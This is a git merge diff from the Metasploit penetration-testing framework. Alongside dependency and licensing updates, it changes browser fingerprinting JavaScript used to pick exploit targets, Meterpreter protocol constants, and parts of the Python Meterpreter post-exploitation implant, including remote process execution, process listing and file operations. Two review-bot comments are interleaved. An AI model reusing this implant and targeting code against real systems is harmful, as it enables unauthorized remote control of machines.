Merge branch 'master' of git://github.com/rapid7/metasploit-framework into dlink_upnp_msearch_command_injection
This commit is contained in:
commit
51001f9cb3
|
@ -1,4 +1,6 @@
|
|||
.bundle
|
||||
Gemfile.local
|
||||
Gemfile.local.lock
|
||||
# Rubymine project directory
|
||||
.idea
|
||||
# Sublime Text project directory (not created by ST by default)
|
||||
|
|
1
.mailmap
1
.mailmap
|
@ -18,6 +18,7 @@ todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
|
|||
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
|
||||
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
|
||||
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
|
||||
trosen-r7 <trosen-r7@github> Trevor Rosen <trevor@catapult-creative.com>
|
||||
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
|
||||
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
|
||||
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
|
||||
|
|
|
@ -1 +1 @@
|
|||
1.9.3-p484
|
||||
1.9.3-p547
|
||||
|
|
|
@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
|
|||
#### New Modules
|
||||
|
||||
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
|
||||
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
||||
* **Don't** include more than one module per pull request.
|
||||
|
||||
#### Library Code
|
||||
|
|
8
Gemfile
8
Gemfile
|
@ -10,18 +10,20 @@ gem 'json'
|
|||
gem 'msgpack'
|
||||
# Needed by anemone crawler
|
||||
gem 'nokogiri'
|
||||
# Needed by db.rb and Msf::Exploit::Capture
|
||||
gem 'packetfu', '1.1.9'
|
||||
# Needed by JSObfu
|
||||
gem 'rkelly-remix', '0.0.6'
|
||||
# Needed by anemone crawler
|
||||
gem 'robots'
|
||||
# Needed by db.rb and Msf::Exploit::Capture
|
||||
gem 'packetfu', '1.1.9'
|
||||
# Needed for some post modules
|
||||
gem 'sqlite3'
|
||||
|
||||
group :db do
|
||||
# Needed for Msf::DbManager
|
||||
gem 'activerecord', '>= 3.0.0', '< 4.0.0'
|
||||
# Database models shared between framework and Pro.
|
||||
gem 'metasploit_data_models', '~> 0.17.0'
|
||||
gem 'metasploit_data_models', '0.17.0'
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
gem 'pg', '>= 0.11'
|
||||
end
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
##
|
||||
# Example Gemfile.local file for Metasploit Framework
|
||||
#
|
||||
# The Gemfile.local file provides a way to use other gems that are not
|
||||
# included in the standard Gemfile provided with Metasploit.
|
||||
# This filename is included in Metasploit's .gitignore file, so local changes
|
||||
# to this file will not accidentally show up in future pull requests. This
|
||||
# example Gemfile.local includes all gems in Gemfile using instance_eval.
|
||||
# It also creates a new bundle group, 'local', to hold additional gems.
|
||||
#
|
||||
# This file will not be used by default within the framework. As such, one
|
||||
# must first install the custom Gemfile.local with bundle:
|
||||
# bundle install --gemfile Gemfile.local
|
||||
#
|
||||
# Note that msfupdate does not consider Gemfile.local when updating the
|
||||
# framework. If it is used, it may be necessary to run the above bundle
|
||||
# command after the update.
|
||||
#
|
||||
###
|
||||
|
||||
# Include the Gemfile included with the framework. This is very
|
||||
# important for picking up new gem dependencies.
|
||||
msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
|
||||
if File.readable?(msf_gemfile)
|
||||
instance_eval(File.read(msf_gemfile))
|
||||
end
|
||||
|
||||
# Create a custom group
|
||||
group :local do
|
||||
# Use pry to help view and interact with objects in the framework
|
||||
gem 'pry', '~> 0.9'
|
||||
# Use pry-debugger to step through code during development
|
||||
gem 'pry-debugger', '~> 0.2'
|
||||
# Add the lab gem so that the 'lab' plugin will work again
|
||||
gem 'lab', '~> 0.2.7'
|
||||
end
|
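Review bot: The `if File.readable?(msf_gemfile)` guard around `instance_eval(File.read(msf_gemfile))` silently drops every framework dependency when the sibling Gemfile is missing or unreadable, and `bundle install --gemfile Gemfile.local` still succeeds with only the :local group, which is hard to notice; raising there is safer, e.g. `raise "framework Gemfile not found at #{msf_gemfile}" unless File.readable?(msf_gemfile)`. The evaluated text should also carry its own filename so syntax errors and backtraces point at the framework Gemfile rather than Gemfile.local: `instance_eval(File.read(msf_gemfile), msf_gemfile)`. Both belong in the "Include the Gemfile" block near the top of the new file.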
|
@ -53,6 +53,7 @@ GEM
|
|||
multi_json (~> 1.0.3)
|
||||
simplecov-html (~> 0.5.3)
|
||||
simplecov-html (0.5.3)
|
||||
sqlite3 (1.3.9)
|
||||
timecop (0.6.3)
|
||||
tzinfo (0.3.37)
|
||||
yard (0.8.7)
|
||||
|
@ -68,7 +69,7 @@ DEPENDENCIES
|
|||
factory_girl (>= 4.1.0)
|
||||
fivemat (= 1.2.1)
|
||||
json
|
||||
metasploit_data_models (~> 0.17.0)
|
||||
metasploit_data_models (= 0.17.0)
|
||||
msgpack
|
||||
network_interface (~> 0.0.1)
|
||||
nokogiri
|
||||
|
@ -82,5 +83,6 @@ DEPENDENCIES
|
|||
rspec (>= 2.12)
|
||||
shoulda-matchers
|
||||
simplecov (= 0.5.4)
|
||||
sqlite3
|
||||
timecop
|
||||
yard
|
||||
|
|
4
LICENSE
4
LICENSE
|
@ -36,6 +36,10 @@ Files: external/ruby-lorcon/*
|
|||
Copyright: 2005, dragorn and Joshua Wright
|
||||
License: LGPL-2.1
|
||||
|
||||
Files: external/source/exploits/IE11SandboxEscapes/*
|
||||
Copyright: James Forshaw, 2014
|
||||
License: GPLv3
|
||||
|
||||
Files: external/source/byakugan/*
|
||||
Copyright: Lurene Grenier, 2009
|
||||
License: BSD-3-clause
|
||||
|
|
|
@ -20,6 +20,7 @@ arch_armle = "armle";
|
|||
arch_x86 = "x86";
|
||||
arch_x86_64 = "x86_64";
|
||||
arch_ppc = "ppc";
|
||||
arch_mipsle = "mipsle";
|
||||
|
||||
window.os_detect = {};
|
||||
|
||||
|
@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
|
|||
} else if (platform.match(/arm/)) {
|
||||
// Android and maemo
|
||||
arch = arch_armle;
|
||||
if (navigator.userAgent.match(/android/i)) {
|
||||
os_flavor = 'Android';
|
||||
}
|
||||
} else if (platform.match(/x86/)) {
|
||||
arch = arch_x86;
|
||||
} else if (platform.match(/mips/)) {
|
||||
arch = arch_mipsle;
|
||||
}
|
||||
|
||||
|
||||
if (navigator.userAgent.match(/android/i)) {
|
||||
os_flavor = 'Android';
|
||||
}
|
||||
} else if (platform.match(/windows/)) {
|
||||
os_name = oses_windows;
|
||||
|
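Review bot: The new `else if (platform.match(/mips/))` branch assigns `arch_mipsle` to every platform string containing "mips", so a big-endian MIPS client (if navigator.platform reports it the same way) is labelled little-endian; a comment stating the assumption, e.g. `// assumes little-endian MIPS; navigator.platform does not expose endianness`, would make that explicit. Moving the Android userAgent check out of the arm branch also means os_flavor is now set for x86 and mips Android devices, which looks intended but is worth a one-line comment above `if (navigator.userAgent.match(/android/i))` so it is not folded back. getVersion begins outside the hunk.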
|
|
@ -6,10 +6,10 @@
|
|||
##
|
||||
# General
|
||||
##
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
|
||||
define("TLV_TYPE_HANDLE", TLV_META_TYPE_QWORD | 600);
|
||||
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
|
||||
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_QWORD | 630);
|
||||
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_QWORD | 631);
|
||||
|
||||
##
|
||||
# Fs
|
||||
|
@ -65,7 +65,7 @@ define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
|
|||
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
|
||||
|
||||
# Registry
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
|
||||
define("TLV_TYPE_HKEY", TLV_META_TYPE_QWORD | 1000);
|
||||
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
|
||||
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
|
||||
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
|
||||
|
@ -90,12 +90,12 @@ define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
|
|||
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
|
||||
|
||||
# Process
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
|
||||
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_QWORD | 2000);
|
||||
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
|
||||
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
|
||||
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
|
||||
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
|
||||
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_QWORD | 2005);
|
||||
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
|
||||
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
|
||||
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
|
||||
|
@ -109,16 +109,16 @@ define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
|
|||
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
|
||||
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
|
||||
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
|
||||
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_QWORD | 2403);
|
||||
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_QWORD | 2404);
|
||||
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
|
||||
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
|
||||
|
||||
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
|
||||
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
|
||||
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
|
||||
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_QWORD | 2511);
|
||||
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_QWORD | 2512);
|
||||
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
|
||||
|
||||
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
|
||||
|
@ -137,7 +137,7 @@ define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
|
|||
# Event Log
|
||||
##
|
||||
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
|
||||
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_QWORD | 4001);
|
||||
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
|
||||
|
||||
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);
|
||||
|
|
|
@ -48,6 +48,24 @@ try:
|
|||
except ImportError:
|
||||
has_winreg = False
|
||||
|
||||
try:
|
||||
import winreg
|
||||
has_winreg = True
|
||||
except ImportError:
|
||||
has_winreg = (has_winreg or False)
|
||||
|
||||
if sys.version_info[0] < 3:
|
||||
is_str = lambda obj: issubclass(obj.__class__, str)
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, str)
|
||||
bytes = lambda *args: str(*args[:1])
|
||||
NULL_BYTE = '\x00'
|
||||
else:
|
||||
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
|
||||
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
|
||||
str = lambda x: __builtins__['str'](x, 'UTF-8')
|
||||
NULL_BYTE = bytes('\x00', 'UTF-8')
|
||||
long = int
|
||||
|
||||
if has_ctypes:
|
||||
#
|
||||
# Windows Structures
|
||||
|
@ -234,6 +252,7 @@ TLV_META_TYPE_STRING = (1 << 16)
|
|||
TLV_META_TYPE_UINT = (1 << 17)
|
||||
TLV_META_TYPE_RAW = (1 << 18)
|
||||
TLV_META_TYPE_BOOL = (1 << 19)
|
||||
TLV_META_TYPE_QWORD = (1 << 20)
|
||||
TLV_META_TYPE_COMPRESSED = (1 << 29)
|
||||
TLV_META_TYPE_GROUP = (1 << 30)
|
||||
TLV_META_TYPE_COMPLEX = (1 << 31)
|
||||
|
@ -266,10 +285,10 @@ TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
|
|||
##
|
||||
# General
|
||||
##
|
||||
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
|
||||
TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
|
||||
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
|
||||
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
|
||||
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
|
||||
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
|
||||
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
|
||||
|
||||
##
|
||||
# Fs
|
||||
|
@ -328,7 +347,7 @@ TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
|
|||
##
|
||||
# Registry
|
||||
##
|
||||
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
|
||||
TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000
|
||||
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
|
||||
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
|
||||
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
|
||||
|
@ -358,12 +377,12 @@ DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
|
|||
##
|
||||
# Process
|
||||
##
|
||||
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
|
||||
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000
|
||||
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
|
||||
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
|
||||
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
|
||||
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
|
||||
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
|
||||
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005
|
||||
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
|
||||
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
|
||||
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
|
||||
|
@ -379,16 +398,16 @@ TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
|
|||
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
|
||||
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
|
||||
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
|
||||
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
|
||||
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
|
||||
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403
|
||||
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_QWORD | 2404
|
||||
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
|
||||
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
|
||||
|
||||
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
|
||||
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
|
||||
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
|
||||
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
|
||||
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
|
||||
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511
|
||||
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512
|
||||
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
|
||||
|
||||
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
|
||||
|
@ -407,7 +426,7 @@ TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
|
|||
# Event Log
|
||||
##
|
||||
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
|
||||
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
|
||||
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001
|
||||
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
|
||||
|
||||
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
|
||||
|
@ -498,11 +517,12 @@ def get_stat_buffer(path):
|
|||
blocks = si.st_blocks
|
||||
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
|
||||
st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
|
||||
st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
|
||||
st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
|
||||
st_buf += struct.pack('<II', blksize, blocks)
|
||||
return st_buf
|
||||
|
||||
def netlink_request(req_type):
|
||||
import select
|
||||
# See RFC 3549
|
||||
NLM_F_REQUEST = 0x0001
|
||||
NLM_F_ROOT = 0x0100
|
||||
|
@ -513,17 +533,25 @@ def netlink_request(req_type):
|
|||
sock.bind((os.getpid(), 0))
|
||||
seq = int(time.time())
|
||||
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
|
||||
sfd = os.fdopen(sock.fileno(), 'w+b')
|
||||
sfd.write(nlmsg)
|
||||
sock.send(nlmsg)
|
||||
responses = []
|
||||
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
||||
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
|
||||
return responses
|
||||
raw_response_data = sock.recv(0xfffff)
|
||||
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
|
||||
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
|
||||
while response.type != NLMSG_DONE:
|
||||
if response.type == NLMSG_ERROR:
|
||||
break
|
||||
response_data = sfd.read(response.len - 16)
|
||||
response_data = raw_response_data[:(response.len - 16)]
|
||||
responses.append(response_data)
|
||||
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
||||
sfd.close()
|
||||
raw_response_data = raw_response_data[len(response_data):]
|
||||
if not len(raw_response_data):
|
||||
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
|
||||
break
|
||||
raw_response_data = sock.recv(0xfffff)
|
||||
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
|
||||
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
|
||||
sock.close()
|
||||
return responses
|
||||
|
||||
|
@ -559,7 +587,7 @@ def channel_open_stdapi_fs_file(request, response):
|
|||
else:
|
||||
fmode = 'rb'
|
||||
file_h = open(fpath, fmode)
|
||||
channel_id = meterpreter.add_channel(file_h)
|
||||
channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
|
||||
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
|
@ -675,6 +703,7 @@ def stdapi_sys_process_execute(request, response):
|
|||
proc_h.stderr = open(os.devnull, 'rb')
|
||||
else:
|
||||
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
proc_h.echo_protection = True
|
||||
proc_h.start()
|
||||
else:
|
||||
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
|
@ -693,15 +722,15 @@ def stdapi_sys_process_getpid(request, response):
|
|||
|
||||
def stdapi_sys_process_get_processes_via_proc(request, response):
|
||||
for pid in os.listdir('/proc'):
|
||||
pgroup = ''
|
||||
pgroup = bytes()
|
||||
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
|
||||
continue
|
||||
cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
|
||||
status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
|
||||
cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
|
||||
cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
|
||||
status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
|
||||
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
|
||||
status_data = filter(lambda x: len(x) == 2, status_data)
|
||||
status = {}
|
||||
for k, v in status_data:
|
||||
for k, v in filter(lambda x: len(x) == 2, status_data):
|
||||
status[k[:-1]] = v.strip()
|
||||
ppid = status.get('PPid')
|
||||
uid = status.get('Uid').split('\t', 1)[0]
|
||||
|
@ -725,14 +754,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
|
|||
def stdapi_sys_process_get_processes_via_ps(request, response):
|
||||
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
|
||||
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||
ps_output = proc_h.stdout.read()
|
||||
ps_output = str(proc_h.stdout.read())
|
||||
ps_output = ps_output.split('\n')
|
||||
ps_output.pop(0)
|
||||
for process in ps_output:
|
||||
process = process.split()
|
||||
if len(process) < 4:
|
||||
break
|
||||
pgroup = ''
|
||||
pgroup = bytes()
|
||||
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
|
||||
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
|
||||
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
|
||||
|
@ -793,7 +822,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
|
|||
use = ctypes.c_ulong()
|
||||
use.value = 0
|
||||
ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
|
||||
complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
|
||||
complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
|
||||
k32.CloseHandle(tkn_h)
|
||||
parch = windll_GetNativeSystemInfo()
|
||||
is_wow64 = ctypes.c_ubyte()
|
||||
|
@ -802,7 +831,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
|
|||
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
|
||||
if is_wow64.value:
|
||||
parch = PROCESS_ARCH_X86
|
||||
pgroup = ''
|
||||
pgroup = bytes()
|
||||
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
|
||||
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
|
||||
pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
|
||||
|
@ -850,16 +879,18 @@ def stdapi_fs_delete_dir(request, response):
|
|||
@meterpreter.register_function
|
||||
def stdapi_fs_delete_file(request, response):
|
||||
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||
os.unlink(file_path)
|
||||
if os.path.exists(file_path):
|
||||
os.unlink(file_path)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
def stdapi_fs_file_expand_path(request, response):
|
||||
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||
if has_windll:
|
||||
path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
|
||||
path_out = (ctypes.c_char * 4096)()
|
||||
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
|
||||
result = ''.join(path_out)[:path_out_len]
|
||||
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
|
||||
result = str(ctypes.string_at(path_out))
|
||||
elif path_tlv == '%COMSPEC%':
|
||||
result = '/bin/sh'
|
||||
elif path_tlv in ['%TEMP%', '%TMP%']:
|
||||
|
@ -912,7 +943,8 @@ def stdapi_fs_md5(request, response):
|
|||
@meterpreter.register_function
|
||||
def stdapi_fs_mkdir(request, response):
|
||||
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
|
||||
os.mkdir(dir_path)
|
||||
if not os.path.isdir(dir_path):
|
||||
os.mkdir(dir_path)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
|
@ -965,7 +997,7 @@ def stdapi_fs_stat(request, response):
|
|||
|
||||
@meterpreter.register_function
|
||||
def stdapi_net_config_get_interfaces(request, response):
|
||||
if hasattr(socket, 'AF_NETLINK'):
|
||||
if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
|
||||
interfaces = stdapi_net_config_get_interfaces_via_netlink()
|
||||
elif has_osxsc:
|
||||
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
|
||||
|
@ -974,7 +1006,7 @@ def stdapi_net_config_get_interfaces(request, response):
|
|||
else:
|
||||
return ERROR_FAILURE, response
|
||||
for iface_info in interfaces:
|
||||
iface_tlv = ''
|
||||
iface_tlv = bytes()
|
||||
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
|
||||
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
|
||||
if 'mtu' in iface_info:
|
||||
|
@ -1002,7 +1034,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
|
|||
0x0100: 'PROMISC',
|
||||
0x1000: 'MULTICAST'
|
||||
}
|
||||
iface_flags_sorted = iface_flags.keys()
|
||||
iface_flags_sorted = list(iface_flags.keys())
|
||||
# Dictionaries don't maintain order
|
||||
iface_flags_sorted.sort()
|
||||
interfaces = {}
|
||||
|
@ -1106,7 +1138,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
|
|||
hw_addr = hw_addr.replace(':', '')
|
||||
hw_addr = hw_addr.decode('hex')
|
||||
iface_info['hw_addr'] = hw_addr
|
||||
ifnames = interfaces.keys()
|
||||
ifnames = list(interfaces.keys())
|
||||
ifnames.sort()
|
||||
for iface_name, iface_info in interfaces.items():
|
||||
iface_info['index'] = ifnames.index(iface_name)
|
||||
|
@ -1138,7 +1170,10 @@ def stdapi_net_config_get_interfaces_via_windll():
|
|||
iface_info['index'] = AdapterAddresses.u.s.IfIndex
|
||||
if AdapterAddresses.PhysicalAddressLength:
|
||||
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
|
||||
iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
|
||||
iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
|
||||
if not is_str(iface_desc):
|
||||
iface_desc = str(iface_desc)
|
||||
iface_info['name'] = iface_desc
|
||||
